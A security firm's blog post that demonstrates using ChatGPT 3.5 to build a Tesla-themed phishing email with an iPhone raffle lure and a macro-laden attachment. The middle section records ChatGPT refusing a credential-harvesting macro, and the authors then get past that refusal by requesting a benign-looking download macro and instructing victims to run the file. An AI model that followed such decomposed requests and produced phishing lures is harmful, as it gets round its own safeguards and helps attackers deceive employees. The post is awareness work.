Is ChatGPT Your Next Phishing Enemy?

Is ChatGPT Your Next Phishing Enemy?

AI Phishing with ChatGPT

AI technologies such as ChatGPT and Google Bard have the potential to revolutionize productivity and convenience. However, the negative implications of AI, specifically in the realm of cybersecurity, are often overlooked.

For instance, tools like ChatGPT can greatly aid marketing employees in creating templates, emails, logos, and more with speed and efficiency. Unfortunately, these same tools can be exploited by malicious actors to easily craft convincing phishing emails.

According to IBM’s X-Force Threat Intelligence Index 2023, up to 41% of breaches occur due to employees unwittingly opening malicious documents (“maldocs”) embedded in phishing emails. Despite advancements in email scanners and antivirus solutions, such incidents are increasing.

To illustrate the risks associated with AI-generated phishing emails, Pensive Security conducted a test using the ChatGPT 3.5 service to create a reasonably believable phishing campaign with minimal user input.

Generating The Email Template

We began by asking ChatGPT to create an email template for the target company; in this case, we specified Tesla.com and included a link to their logo and color scheme. ChatGPT responded with a basic Thank you for subscribing style template, which was well-written and did not contain misspellings or grammatical errors. The template even includes a link to the Tesla website at the bottom.

Email Template Iteration #1

A common tactic of phishing emails is to incentivize users to open a maldoc or submit their personal information to a phishing site with the the promise of rewards such as a free iPhone or vacation. We asked ChatGPT if it could edit the template to reflect an end-of-the-year iPhone raffle which employees would need to enter to be eligible for. Again ChatGPT responded with a great template body; however, it still appeared to be writing to Telsa’s customers instead of their employees:

Email Template Iteration #2

Targeting Internal Employees: Setting the Bait

After a few input suggestions, we were able to change the contest to one focused on internal employees, which asks the user to open an attached maldoc and run a macro. We requested the macro open a dialog box that asks for the user’s username and password and sends the credentials to another site controlled by Pensive Security.

Fortunately, ChatGPT caught on that such a request is often used for nefarious purposes and blocked the updated template:

ChatGPT Detected Malicious Request

We then decided to ask ChatGPT to create a macro that would download a file to the user’s desktop called entry. In this example, the file is a sample text document; however, in a real phishing campaign, the file is often a remote-access trojan or PowerShell script that can provide access to a company’s internal network or infect the machine with ransomware.

Sample Macro to Download File

We then regenerated the template with explicit instructions to open the attached maldoc, enable macros, and then run the entry file that was downloaded to the desktop. We kept the maldoc simple and only added the company’s logo and a brief instruction to enable macros and run the corresponding file.

The Final Proof-of-Concept

After a few further tweaks, such as editing the macro to run once the maldoc was opened, and modifying the download URL, we were ready to send out our AI-generated phishing email:

AI-Generated Phishing Email

An unsuspecting user receives our email and follows the instructions which executes the payload:

Macro Executes as a Proof of Concept

The Future of Phishing is AI.

When we first set out to test AI-generated phishing, we were admittedly somewhat skeptical—Could they reliably generate convincing, human-like emails that would entice users to run their contents?

We believe the above proof-of-concept demonstrates that with minimal technical knowledge, an attacker can easily create specially-targeted phishing emails with tools such as ChatGPT and Bard. These tools have already reached the point where it is difficult to distinguish real from computer-generated emails and communications.

ChatGPT itself provides a list of possibilities for the future of AI phishing.

ChatGPT’s Conclusion

The following was generated by ChatGPT 3.5 Turbo:

The danger of AI-generated phishing emails lies in their ability to mimic human communication and bypass traditional spam filters. AI. algorithms can analyze large datasets of legitimate emails to understand patterns, language usage, and contextual information, allowing them to generate highly convincing phishing messages. These emails may contain personalized details, appear to come from trusted sources, or imitate the tone and style of genuine communications, making them difficult to detect as fraudulent.

The future use and impact of AI-generated phishing emails are likely to be concerning. Here are some potential predictions:

Increased sophistication: As AI technology advances, phishing emails will become even more sophisticated and possibly indistinguishable from genuine messages. AI algorithms will continuously learn from successful attacks, adapting their tactics and evolving to bypass security measures.

Targeted attacks: AI can analyze publicly available information from social media, online profiles, or leaked databases to personalize phishing emails and target individuals or organizations with tailored content. This approach increases the effectiveness of attacks, as recipients are more likely to trust emails that appear relevant and familiar.

Automation and scale: AI-powered systems could one day automate an entire phishing process, from generating emails to launching attacks on a massive scale. This capability enables cybercriminals to target a large number of individuals simultaneously, increasing the chances of success and maximizing the impact of their campaigns.

Impersonation of trusted entities: AI algorithms can imitate the communication styles and patterns of well-known brands, companies, or even individuals close to the target. This impersonation creates a sense of trust, making recipients more likely to disclose sensitive information or perform malicious actions.

Evasion of security measures: AI-generated phishing emails have the potential to evade traditional email security filters and anti-phishing technologies. Cybercriminals can leverage AI techniques to identify and exploit vulnerabilities in email systems, making it challenging for users and organizations to defend against these attacks.

To mitigate the risks associated with AI-generated phishing emails, it will be crucial to develop advanced security solutions that can detect and counter these evolving threats. Organizations and individuals should also maintain a high level of awareness, employ strong security practices, and exercise caution when interacting with suspicious emails or providing sensitive information online.

Want to learn more? Schedule a call with a cybersecurity expert today!

Source Code Analysis
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×